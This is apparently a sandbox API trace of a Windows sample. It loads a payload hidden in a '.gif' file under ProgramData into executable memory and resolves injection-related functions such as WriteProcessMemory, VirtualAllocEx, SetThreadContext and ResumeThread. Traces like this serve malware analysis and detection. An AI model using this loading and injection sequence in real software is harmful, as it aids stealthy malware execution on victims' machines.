[0085.931] GetFileSize (in: hFile=0xd8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2ec00
[0085.931] _hread (in: hFile=0xd8, lpBuffer=0x79c72c, lBytes=191488 | out: lpBuffer=0x79c72c*) returned 191488
[0085.985] _lclose (hFile=0xd8) returned 0x0
[0085.985] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c:\\programdata\\tempa\\marxvxinhhmxb.gif", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38
[0085.985] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="c:\\programdata\\tempa\\marxvxinhhmxb.gif", cchWideChar=38, lpMultiByteStr=0x821ccc, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c:\\programdata\\tempa\\marxvxinhhmxb.gif", lpUsedDefaultChar=0x0) returned 38
[0085.985] _lopen (lpPathName="c:\\programdata\\tempa\\marxvxinhhmxb.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmxb.gif"), iReadWrite=0) returned 0xd8
[0085.985] GetFileSize (in: hFile=0xd8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2be00
[0085.985] _hread (in: hFile=0xd8, lpBuffer=0x7708fc, lBytes=179712 | out: lpBuffer=0x7708fc*) returned 179712
[0085.991] _lclose (hFile=0xd8) returned 0x0
[0085.991] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ff50000
[0085.999] VirtualAlloc (lpAddress=0x400000, dwSize=0x5f000, flAllocationType=0x2000, flProtect=0x40) returned 0x0
[0085.999] VirtualAlloc (lpAddress=0x0, dwSize=0x5f000, flAllocationType=0x2000, flProtect=0x40) returned 0x530000
[0085.999] VirtualAlloc (lpAddress=0x530000, dwSize=0x5f000, flAllocationType=0x1000, flProtect=0x40) returned 0x530000
[0086.001] VirtualAlloc (lpAddress=0x530000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x40) returned 0x530000
[0086.001] VirtualAlloc (lpAddress=0x531000, dwSize=0x4cc00, flAllocationType=0x1000, flProtect=0x40) returned 0x531000
[0086.006] VirtualAlloc (lpAddress=0x57e000, dwSize=0x1200, flAllocationType=0x1000, flProtect=0x40) returned 0x57e000
[0086.007] VirtualAlloc (lpAddress=0x580000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x580000
[0086.007] VirtualAlloc (lpAddress=0x581000, dwSize=0x2200, flAllocationType=0x1000, flProtect=0x40) returned 0x581000
[0086.007] VirtualAlloc (lpAddress=0x584000, dwSize=0x5800, flAllocationType=0x1000, flProtect=0x40) returned 0x584000
[0086.008] VirtualAlloc (lpAddress=0x58a000, dwSize=0x4e00, flAllocationType=0x1000, flProtect=0x40) returned 0x58a000
[0086.008] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=12, lpWideCharStr=0x12d650, cchWideChar=2047 | out: lpWideCharStr="kernel32.dll") returned 12
[0086.008] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75370000
[0086.009] GetProcAddress (hModule=0x75370000, lpProcName="DeleteCriticalSection") returned 0x76f79ac5
[0086.009] GetProcAddress (hModule=0x75370000, lpProcName="LeaveCriticalSection") returned 0x76f67760
[0086.009] GetProcAddress (hModule=0x75370000, lpProcName="EnterCriticalSection") returned 0x76f677a0
[0086.009] GetProcAddress (hModule=0x75370000, lpProcName="InitializeCriticalSection") returned 0x76f7a149
[0086.009] GetProcAddress (hModule=0x75370000, lpProcName="VirtualFree") returned 0x753c1da4
[0086.009] GetProcAddress (hModule=0x75370000, lpProcName="VirtualAlloc") returned 0x753c2fb6
[0086.009] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0086.009] GetProcAddress (hModule=0x75370000, lpProcName="LocalAlloc") returned 0x753c3363
[0086.009] GetProcAddress (hModule=0x75370000, lpProcName="GetVersion") returned 0x753b154e
[0086.009] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThreadId") returned 0x753bbb80
[0086.010] GetProcAddress (hModule=0x75370000, lpProcName="InterlockedDecrement") returned 0x753bbbf0
[0086.010] GetProcAddress (hModule=0x75370000, lpProcName="InterlockedIncrement") returned 0x753bbbc0
[0086.010] GetProcAddress (hModule=0x75370000, lpProcName="VirtualQuery") returned 0x753c76d6
[0086.010] GetProcAddress (hModule=0x75370000, lpProcName="WideCharToMultiByte") returned 0x753c450e
[0086.010] GetProcAddress (hModule=0x75370000, lpProcName="MultiByteToWideChar") returned 0x753c452b
[0086.010] GetProcAddress (hModule=0x75370000, lpProcName="lstrlenA") returned 0x753ba611
[0086.010] GetProcAddress (hModule=0x75370000, lpProcName="lstrcpynA") returned 0x753a8979
[0086.010] GetProcAddress (hModule=0x75370000, lpProcName="LoadLibraryExA") returned 0x753b47fa
[0086.010] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadLocale") returned 0x753b153c
[0086.010] GetProcAddress (hModule=0x75370000, lpProcName="GetStartupInfoA") returned 0x75371e10
[0086.011] GetProcAddress (hModule=0x75370000, lpProcName="GetProcAddress") returned 0x753c33d3
[0086.011] GetProcAddress (hModule=0x75370000, lpProcName="GetModuleHandleA") returned 0x753bcf41
[0086.011] GetProcAddress (hModule=0x75370000, lpProcName="GetModuleFileNameA") returned 0x753c33f6
[0086.011] GetProcAddress (hModule=0x75370000, lpProcName="GetLocaleInfoA") returned 0x753aadbf
[0086.011] GetProcAddress (hModule=0x75370000, lpProcName="GetCommandLineA") returned 0x753c98ff
[0086.011] GetProcAddress (hModule=0x75370000, lpProcName="FreeLibrary") returned 0x753bd9d0
[0086.011] GetProcAddress (hModule=0x75370000, lpProcName="FindFirstFileA") returned 0x753c2d89
[0086.011] GetProcAddress (hModule=0x75370000, lpProcName="FindClose") returned 0x753c0e62
[0086.011] GetProcAddress (hModule=0x75370000, lpProcName="ExitProcess") returned 0x753c214f
[0086.011] GetProcAddress (hModule=0x75370000, lpProcName="WriteFile") returned 0x753c1400
[0086.011] GetProcAddress (hModule=0x75370000, lpProcName="UnhandledExceptionFilter") returned 0x753ced38
[0086.012] GetProcAddress (hModule=0x75370000, lpProcName="RtlUnwind") returned 0x753a7f70
[0086.012] GetProcAddress (hModule=0x75370000, lpProcName="RaiseException") returned 0x753aeb60
[0086.012] GetProcAddress (hModule=0x75370000, lpProcName="GetStdHandle") returned 0x753c1e46
[0086.012] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=10, lpWideCharStr=0x12d650, cchWideChar=2047 | out: lpWideCharStr="user32.dllll") returned 10
[0086.012] LoadLibraryW (lpLibFileName="user32.dll") returned 0x757b0000
[0086.012] GetProcAddress (hModule=0x757b0000, lpProcName="GetKeyboardType") returned 0x757fbfee
[0086.012] GetProcAddress (hModule=0x757b0000, lpProcName="LoadStringA") returned 0x757b66a7
[0086.012] GetProcAddress (hModule=0x757b0000, lpProcName="MessageBoxA") returned 0x7580ea11
[0086.012] GetProcAddress (hModule=0x757b0000, lpProcName="CharNextA") returned 0x757bc861
[0086.012] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=12, lpWideCharStr=0x12d650, cchWideChar=2047 | out: lpWideCharStr="advapi32.dll") returned 12
[0086.012] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x76da0000
[0086.013] GetProcAddress (hModule=0x76da0000, lpProcName="RegQueryValueExA") returned 0x76db48ef
[0086.013] GetProcAddress (hModule=0x76da0000, lpProcName="RegOpenKeyExA") returned 0x76db4907
[0086.013] GetProcAddress (hModule=0x76da0000, lpProcName="RegCloseKey") returned 0x76db469d
[0086.013] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=12, lpWideCharStr=0x12d650, cchWideChar=2047 | out: lpWideCharStr="oleaut32.dll") returned 12
[0086.013] LoadLibraryW (lpLibFileName="oleaut32.dll") returned 0x758f0000
[0086.013] GetProcAddress (hModule=0x758f0000, lpProcName="SysFreeString") returned 0x758f3e59
[0086.013] GetProcAddress (hModule=0x758f0000, lpProcName="SysReAllocStringLen") returned 0x758f7810
[0086.013] GetProcAddress (hModule=0x758f0000, lpProcName="SysAllocStringLen") returned 0x758f45d2
[0086.013] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=12, lpWideCharStr=0x12d650, cchWideChar=2047 | out: lpWideCharStr="kernel32.dll") returned 12
[0086.013] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75370000
[0086.014] GetProcAddress (hModule=0x75370000, lpProcName="TlsSetValue") returned 0x753bda88
[0086.014] GetProcAddress (hModule=0x75370000, lpProcName="TlsGetValue") returned 0x753bda70
[0086.014] GetProcAddress (hModule=0x75370000, lpProcName="TlsFree") returned 0x753c13b8
[0086.014] GetProcAddress (hModule=0x75370000, lpProcName="TlsAlloc") returned 0x753c35a1
[0086.014] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0086.014] GetProcAddress (hModule=0x75370000, lpProcName="LocalAlloc") returned 0x753c3363
[0086.014] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=12, lpWideCharStr=0x12d650, cchWideChar=2047 | out: lpWideCharStr="advapi32.dll") returned 12
[0086.014] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x76da0000
[0086.014] GetProcAddress (hModule=0x76da0000, lpProcName="RegQueryValueExA") returned 0x76db48ef
[0086.014] GetProcAddress (hModule=0x76da0000, lpProcName="RegOpenKeyExA") returned 0x76db4907
[0086.015] GetProcAddress (hModule=0x76da0000, lpProcName="RegCloseKey") returned 0x76db469d
[0086.015] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=12, lpWideCharStr=0x12d650, cchWideChar=2047 | out: lpWideCharStr="kernel32.dll") returned 12
[0086.015] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75370000
[0086.015] GetProcAddress (hModule=0x75370000, lpProcName="lstrcpyA") returned 0x753b9793
[0086.015] GetProcAddress (hModule=0x75370000, lpProcName="WriteProcessMemory") returned 0x753ac1de
[0086.015] GetProcAddress (hModule=0x75370000, lpProcName="WriteFile") returned 0x753c1400
[0086.015] GetProcAddress (hModule=0x75370000, lpProcName="WaitForSingleObject") returned 0x753bba90
[0086.015] GetProcAddress (hModule=0x75370000, lpProcName="VirtualQuery") returned 0x753c76d6
[0086.015] GetProcAddress (hModule=0x75370000, lpProcName="VirtualFree") returned 0x753c1da4
[0086.015] GetProcAddress (hModule=0x75370000, lpProcName="VirtualAllocEx") returned 0x753ac1b6
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="VirtualAlloc") returned 0x753c2fb6
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="TerminateProcess") returned 0x753b2331
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="Sleep") returned 0x753bba46
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="SizeofResource") returned 0x753b3e7f
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadLocale") returned 0x753d88e6
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadContext") returned 0x75400193
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="SetFilePointer") returned 0x753bdb36
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="SetEvent") returned 0x753bbccc
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="SetErrorMode") returned 0x753c4a51
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="SetEndOfFile") returned 0x753b2319
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="ResumeThread") returned 0x753b0f1c
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="ResetEvent") returned 0x753bbcb4
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="ReadProcessMemory") returned 0x753ac1ce
[0086.016] GetProcAddress (hModule=0x75370000, lpProcName="ReadFile") returned 0x753b96fb
[0086.017] GetProcAddress (hModule=0x75370000, lpProcName="MulDiv") returned 0x753bb7a0
[0086.017] GetProcAddress (hModule=0x75370000, lpProcName="LockResource") returned 0x753afd29
[0086.017] GetProcAddress (hModule=0x75370000, lpProcName="LoadResource") returned 0x753b984d
[0086.017] GetProcAddress (hModule=0x75370000, lpProcName="LoadLibraryA") returned 0x753c395c
[0086.017] GetProcAddress (hModule=0x75370000, lpProcName="LeaveCriticalSection") returned 0x76f67760
[0086.017] GetProcAddress (hModule=0x75370000, lpProcName="InitializeCriticalSection") returned 0x76f7a149
[0086.017] GetProcAddress (hModule=0x75370000, lpProcName="GlobalUnlock") returned 0x753b9d50
[0086.017] GetProcAddress (hModule=0x75370000, lpProcName="GlobalReAlloc") returned 0x753aec90
[0086.017] GetProcAddress (hModule=0x75370000, lpProcName="GlobalHandle") returned 0x753ba0c4
[0086.017] GetProcAddress (hModule=0x75370000, lpProcName="GlobalLock") returned 0x753b9e05
[0086.017] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0086.018] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFindAtomA") returned 0x753d6a4b
[0086.018] GetProcAddress (hModule=0x75370000, lpProcName="GlobalDeleteAtom") returned 0x753af16c
[0086.018] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0086.018] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAddAtomA") returned 0x753a83ea
[0086.018] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0086.018] GetProcAddress (hModule=0x75370000, lpProcName="GetVersion") returned 0x753b154e
[0086.018] GetProcAddress (hModule=0x75370000, lpProcName="GetTickCount") returned 0x753bba60
[0086.018] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadLocale") returned 0x753b153c
[0086.018] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadContext") returned 0x753d0cc1
[0086.018] GetProcAddress (hModule=0x75370000, lpProcName="GetSystemInfo") returned 0x753c3728
[0086.019] GetProcAddress (hModule=0x75370000, lpProcName="GetStringTypeExA") returned 0x753a689f
[0086.019] GetProcAddress (hModule=0x75370000, lpProcName="GetStdHandle") returned 0x753c1e46
[0086.019] GetProcAddress (hModule=0x75370000, lpProcName="GetProcAddress") returned 0x753c33d3
[0086.019] GetProcAddress (hModule=0x75370000, lpProcName="GetModuleHandleA") returned 0x753bcf41
[0086.019] GetProcAddress (hModule=0x75370000, lpProcName="GetModuleFileNameA") returned 0x753c33f6
[0086.019] GetProcAddress (hModule=0x75370000, lpProcName="GetLocaleInfoA") returned 0x753aadbf
[0086.019] GetProcAddress (hModule=0x75370000, lpProcName="GetLocalTime") returned 0x753ba90e
[0086.019] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0086.019] GetProcAddress (hModule=0x75370000, lpProcName="GetFullPathNameA") returned 0x753c3735
[0086.019] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceA") returned 0x753cd7d2
[0086.019] GetProcAddress (hModule=0x75370000, lpProcName="GetDateFormatA") returned 0x753d5625
[0086.020] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThreadId") returned 0x753bbb80
[0086.020] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcessId") returned 0x753bcac4
[0086.020] GetProcAddress (hModule=0x75370000, lpProcName="GetCPInfo") returned 0x753c1e2e
[0086.020] GetProcAddress (hModule=0x75370000, lpProcName="GetACP") returned 0x753c39aa
[0086.020] GetProcAddress (hModule=0x75370000, lpProcName="FreeResource") returned 0x753af1bd
[0086.020] GetProcAddress (hModule=0x75370000, lpProcName="InterlockedExchange") returned 0x753bbf0a
[0086.020] GetProcAddress (hModule=0x75370000, lpProcName="FreeLibrary") returned 0x753bd9d0
[0086.020] GetProcAddress (hModule=0x75370000, lpProcName="FormatMessageA") returned 0x753d8868
[0086.020] GetProcAddress (hModule=0x75370000, lpProcName="FindResourceA") returned 0x753ba05b
[0086.020] GetProcAddress (hModule=0x75370000, lpProcName="FindFirstFileA") returned 0x753c2d89
[0086.020] GetProcAddress (hModule=0x75370000, lpProcName="FindClose") returned 0x753c0e62
[0086.021] GetProcAddress (hModule=0x75370000, lpProcName="FileTimeToLocalFileTime") returned 0x753c2004
[0086.021] GetProcAddress (hModule=0x75370000, lpProcName="FileTimeToDosDateTime") returned 0x753b2ce1
[0086.021] GetProcAddress (hModule=0x75370000, lpProcName="EnumCalendarInfoA") returned 0x753d6180
[0086.021] GetProcAddress (hModule=0x75370000, lpProcName="EnterCriticalSection") returned 0x76f677a0
[0086.021] GetProcAddress (hModule=0x75370000, lpProcName="DeleteCriticalSection") returned 0x76f79ac5
[0086.021] GetProcAddress (hModule=0x75370000, lpProcName="CreateThread") returned 0x753c375d
[0086.021] GetProcAddress (hModule=0x75370000, lpProcName="CreateProcessA") returned 0x75372082
[0086.021] GetProcAddress (hModule=0x75370000, lpProcName="CreateFileA") returned 0x753bcee8
[0086.021] GetProcAddress (hModule=0x75370000, lpProcName="CreateEventA") returned 0x753b0ef7
[0086.021] GetProcAddress (hModule=0x75370000, lpProcName="CompareStringA") returned 0x753b0f4a
[0086.021] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0086.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=11, lpWideCharStr=0x12d650, cchWideChar=2047 | out: lpWideCharStr="version.dlll") returned 11
[0086.022] LoadLibraryW (lpLibFileName="version.dll") returned 0x745c0000
[0086.022] GetProcAddress (hModule=0x745c0000, lpProcName="VerQueryValueA") returned 0x745c1b72
[0086.022] GetProcAddress (hModule=0x745c0000, lpProcName="GetFileVersionInfoSizeA") returned 0x745c1c9c
[0086.022] GetProcAddress (hModule=0x745c0000, lpProcName="GetFileVersionInfoA") returned 0x745c1ced
[0086.022] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=9, lpWideCharStr=0x12d650, cchWideChar=2047 | out: lpWideCharStr="gdi32.dlllll") returned 9
[0086.022] LoadLibraryW (lpLibFileName="gdi32.dll") returned 0x75880000
[0086.022] GetProcAddress (hModule=0x75880000, lpProcName="UnrealizeObject") returned 0x7588fb63
[0086.022] GetProcAddress (hModule=0x75880000, lpProcName="StretchBlt") returned 0x7588f467
[0086.022] GetProcAddress (hModule=0x75880000, lpProcName="SetWindowOrgEx") returned 0x75888546
[0086.023] GetProcAddress (hModule=0x75880000, lpProcName="SetViewportOrgEx") returned 0x7588834f
[0086.023] GetProcAddress (hModule=0x75880000, lpProcName="SetTextColor") returned 0x75886906
[0086.023] GetProcAddress (hModule=0x75880000, lpProcName="SetStretchBltMode") returned 0x75887705
[0086.023] GetProcAddress (hModule=0x75880000, lpProcName="SetROP2") returned 0x7588f9e0
[0086.023] GetProcAddress (hModule=0x75880000, lpProcName="SetPixel") returned 0x758a14f3
[0086.023] GetProcAddress (hModule=0x75880000, lpProcName="SetDIBColorTable") returned 0x758a1492
[0086.023] GetProcAddress (hModule=0x75880000, lpProcName="SetBrushOrgEx") returned 0x7588c4c5
[0086.023] GetProcAddress (hModule=0x75880000, lpProcName="SetBkMode") returned 0x758869b1
[0086.023] GetProcAddress (hModule=0x75880000, lpProcName="SetBkColor") returned 0x75886a3c
[0086.023] GetProcAddress (hModule=0x75880000, lpProcName="SelectPalette") returned 0x7588a1f6
[0086.023] GetProcAddress (hModule=0x75880000, lpProcName="SelectObject") returned 0x75886640
[0086.024] GetProcAddress (hModule=0x75880000, lpProcName="SaveDC") returned 0x7588a74b
[0086.024] GetProcAddress (hModule=0x75880000, lpProcName="RestoreDC") returned 0x7588a67b
[0086.024] GetProcAddress (hModule=0x75880000, lpProcName="RectVisible") returned 0x75888f13
[0086.024] GetProcAddress (hModule=0x75880000, lpProcName="RealizePalette") returned 0x7588ef91
[0086.024] GetProcAddress (hModule=0x75880000, lpProcName="PatBlt") returned 0x758862af
[0086.024] GetProcAddress (hModule=0x75880000, lpProcName="MoveToEx") returned 0x75888c21
[0086.024] GetProcAddress (hModule=0x75880000, lpProcName="MaskBlt") returned 0x7588c7ad
[0086.024] GetProcAddress (hModule=0x75880000, lpProcName="LineTo") returned 0x7588f59b
[0086.024] GetProcAddress (hModule=0x75880000, lpProcName="IntersectClipRect") returned 0x75887dfe
[0086.024] GetProcAddress (hModule=0x75880000, lpProcName="GetWindowOrgEx") returned 0x7588d1bf
[0086.025] GetProcAddress (hModule=0x75880000, lpProcName="GetTextMetricsA") returned 0x7588d0f2
[0086.025] GetProcAddress (hModule=0x75880000, lpProcName="GetTextExtentPoint32A") returned 0x758907b0
[0086.025] GetProcAddress (hModule=0x75880000, lpProcName="GetSystemPaletteEntries") returned 0x7588c2e1
[0086.025] GetProcAddress (hModule=0x75880000, lpProcName="GetStockObject") returned 0x75885ddf
[0086.025] GetProcAddress (hModule=0x75880000, lpProcName="GetPixel") returned 0x7588c3d5
[0086.025] GetProcAddress (hModule=0x75880000, lpProcName="GetPaletteEntries") returned 0x7588c2aa
[0086.025] GetProcAddress (hModule=0x75880000, lpProcName="GetObjectA") returned 0x7588914f
[0086.025] GetProcAddress (hModule=0x75880000, lpProcName="GetDeviceCaps") returned 0x75886f7f
[0086.025] GetProcAddress (hModule=0x75880000, lpProcName="GetDIBits") returned 0x7588a23b
[0086.025] GetProcAddress (hModule=0x75880000, lpProcName="GetDIBColorTable") returned 0x7588a149
[0086.025] GetProcAddress (hModule=0x75880000, lpProcName="GetDCOrgEx") returned 0x7588fa75
[0086.026] GetProcAddress (hModule=0x75880000, lpProcName="GetCurrentPositionEx") returned 0x75888d78
[0086.026] GetProcAddress (hModule=0x75880000, lpProcName="GetClipBox") returned 0x75888525
[0086.026] GetProcAddress (hModule=0x75880000, lpProcName="GetBrushOrgEx") returned 0x7588c943
[0086.026] GetProcAddress (hModule=0x75880000, lpProcName="GetBitmapBits") returned 0x7588c1ba
[0086.026] GetProcAddress (hModule=0x75880000, lpProcName="ExcludeClipRect") returned 0x75889218
[0086.026] GetProcAddress (hModule=0x75880000, lpProcName="DeleteObject") returned 0x75885f14
[0086.026] GetProcAddress (hModule=0x75880000, lpProcName="DeleteDC") returned 0x75886eaa
[0086.026] GetProcAddress (hModule=0x75880000, lpProcName="CreateSolidBrush") returned 0x75886b49
[0086.026] GetProcAddress (hModule=0x75880000, lpProcName="CreatePenIndirect") returned 0x7589744d
[0086.026] GetProcAddress (hModule=0x75880000, lpProcName="CreatePalette") returned 0x7588b1b0
[0086.026] GetProcAddress (hModule=0x75880000, lpProcName="CreateHalftonePalette") returned 0x7588c2cd
[0086.027] GetProcAddress (hModule=0x75880000, lpProcName="CreateFontIndirectA") returned 0x7588d22d
[0086.027] GetProcAddress (hModule=0x75880000, lpProcName="CreateDIBitmap") returned 0x7588a379
[0086.027] GetProcAddress (hModule=0x75880000, lpProcName="CreateDIBSection") returned 0x75888850
[0086.027] GetProcAddress (hModule=0x75880000, lpProcName="CreateCompatibleDC") returned 0x75886888
[0086.027] GetProcAddress (hModule=0x75880000, lpProcName="CreateCompatibleBitmap") returned 0x758873ad
[0086.027] GetProcAddress (hModule=0x75880000, lpProcName="CreateBrushIndirect") returned 0x7588993c
[0086.027] GetProcAddress (hModule=0x75880000, lpProcName="CreateBitmap") returned 0x75886b79
[0086.027] GetProcAddress (hModule=0x75880000, lpProcName="BitBlt") returned 0x758872c0
[0086.027] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x173288c, cbMultiByte=10, lpWideCharStr=0x12d650, cchWideChar=2047 | out: lpWideCharStr="user32.dllll") returned 10
[0086.027] LoadLibraryW (lpLibFileName="user32.dll") returned 0x757b0000
[0086.027] GetProcAddress (hModule=0x757b0000, lpProcName="CreateWindowExA") returned 0x757bbf40
[0086.028] GetProcAddress (hModule=0x757b0000, lpProcName="WindowFromPoint") returned 0x757e6be9
[0086.028] GetProcAddress (hModule=0x757b0000, lpProcName="WinHelpA") returned 0x757d471e
[0086.028] GetProcAddress (hModule=0x757b0000, lpProcName="WaitMessage") returned 0x757c66bd
[0086.028] GetProcAddress (hModule=0x757b0000, lpProcName="UpdateWindow") returned 0x757bffa8
[0086.028] GetProcAddress (hModule=0x757b0000, lpProcName="UnregisterClassA") returned 0x757b8d70
[0086.028] GetProcAddress (hModule=0x757b0000, lpProcName="UnhookWindowsHookEx") returned 0x757badf9
[0086.028] GetProcAddress (hModule=0x757b0000, lpProcName="TranslateMessage") returned 0x757c64c7
[0086.028] GetProcAddress (hModule=0x757b0000, lpProcName="TranslateMDISysAccel") returned 0x757e1a5a
[0086.028] GetProcAddress (hModule=0x757b0000, lpProcName="TrackPopupMenu") returned 0x757d2228
[0086.028] GetProcAddress (hModule=0x757b0000, lpProcName="SystemParametersInfoA") returned 0x757b80e0
[0086.029] GetProcAddress (hModule=0x757b0000, lpProcName="ShowWindow") returned 0x757bf2a9
[0086.029] GetProcAddress (hModule=0x757b0000, lpProcName="ShowScrollBar") returned 0x757e3c89
[0086.029] GetProcAddress (hModule=0x757b0000, lpProcName="ShowOwnedPopups") returned 0x757e28ca
[0086.029] GetProcAddress (hModule=0x757b0000, lpProcName="ShowCursor") returned 0x757b64d3
[0086.029] GetProcAddress (hModule=0x757b0000, lpProcName="SetWindowsHookExA") returned 0x757e6d0c
[0086.029] GetProcAddress (hModule=0x757b0000, lpProcName="SetWindowPos") returned 0x757c1bc4
[0086.029] GetProcAddress (hModule=0x757b0000, lpProcName="SetWindowPlacement") returned 0x757b7f78
[0086.029] GetProcAddress (hModule=0x757b0000, lpProcName="SetWindowLongA") returned 0x757b8ba3
[0086.029] GetProcAddress (hModule=0x757b0000, lpProcName="SetTimer") returned 0x757c52ef
[0086.029] GetProcAddress (hModule=0x757b0000, lpProcName="SetScrollRange") returned 0x757b8ec5
[0086.029] GetProcAddress (hModule=0x757b0000, lpProcName="SetScrollPos") returned 0x757e04be
[0086.030] GetProcAddress (hModule=0x757b0000, lpProcName="SetScrollInfo") returned 0x757c48da
[0086.030] GetProcAddress (hModule=0x757b0000, lpProcName="SetRect") returned 0x757c498b
[0086.030] GetProcAddress (hModule=0x757b0000, lpProcName="SetPropA") returned 0x757e28e5
[0086.030] GetProcAddress (hModule=0x757b0000, lpProcName="SetParent") returned 0x757b8314
[0086.074] GetProcAddress (hModule=0x757b0000, lpProcName="SetMenuItemInfoA") returned 0x757d6d15
[0086.074] GetProcAddress (hModule=0x757b0000, lpProcName="SetMenu") returned 0x757e6b0e
[0086.074] GetProcAddress (hModule=0x757b0000, lpProcName="SetForegroundWindow") returned 0x757bb225
[0086.074] GetProcAddress (hModule=0x757b0000, lpProcName="SetFocus") returned 0x757babad
[0086.074] GetProcAddress (hModule=0x757b0000, lpProcName="SetCursor") returned 0x757c3075
[0086.075] GetProcAddress (hModule=0x757b0000, lpProcName="SetClassLongA") returned 0x757e1236
[0086.075] GetProcAddress (hModule=0x757b0000, lpProcName="SetCapture") returned 0x757e6932
[0086.075] GetProcAddress (hModule=0x757b0000, lpProcName="SetActiveWindow") returned 0x757c333a
[0086.075] GetProcAddress (hModule=0x757b0000, lpProcName="SendMessageA") returned 0x757bad60
[0086.075] GetProcAddress (hModule=0x757b0000, lpProcName="ScrollWindow") returned 0x757dfc1d
[0086.075] GetProcAddress (hModule=0x757b0000, lpProcName="ScreenToClient") returned 0x757ba506
[0086.075] GetProcAddress (hModule=0x757b0000, lpProcName="RemovePropA") returned 0x757e2551
[0086.075] GetProcAddress (hModule=0x757b0000, lpProcName="RemoveMenu") returned 0x757b86e8
[0086.075] GetProcAddress (hModule=0x757b0000, lpProcName="ReleaseDC") returned 0x757c5421
[0086.075] GetProcAddress (hModule=0x757b0000, lpProcName="ReleaseCapture") returned 0x757e69f2
[0086.075] GetProcAddress (hModule=0x757b0000, lpProcName="RegisterWindowMessageA") returned 0x757bc091
[0086.076] GetProcAddress (hModule=0x757b0000, lpProcName="RegisterClipboardFormatA") returned 0x757bc091
[0086.076] GetProcAddress (hModule=0x757b0000, lpProcName="RegisterClassA") returned 0x757bbc6a
[0086.076] GetProcAddress (hModule=0x757b0000, lpProcName="RedrawWindow") returned 0x757c29bc
[0086.076] GetProcAddress (hModule=0x757b0000, lpProcName="PtInRect") returned 0x757c2392
[0086.076] GetProcAddress (hModule=0x757b0000, lpProcName="PostQuitMessage") returned 0x757bb308
[0086.076] GetProcAddress (hModule=0x757b0000, lpProcName="PostMessageA") returned 0x757bb446
[0086.076] GetProcAddress (hModule=0x757b0000, lpProcName="PeekMessageA") returned 0x757c19a5
[0086.076] GetProcAddress (hModule=0x757b0000, lpProcName="OffsetRect") returned 0x757ccdab
[0086.076] GetProcAddress (hModule=0x757b0000, lpProcName="OemToCharA") returned 0x7580f041
[0086.076] GetProcAddress (hModule=0x757b0000, lpProcName="MessageBoxA") returned 0x7580ea11
[0086.076] GetProcAddress (hModule=0x757b0000, lpProcName="MapWindowPoints") returned 0x757c5caa
[0086.077] GetProcAddress (hModule=0x757b0000, lpProcName="MapVirtualKeyA") returned 0x757e6038
[0086.077] GetProcAddress (hModule=0x757b0000, lpProcName="LoadStringA") returned 0x757b66a7
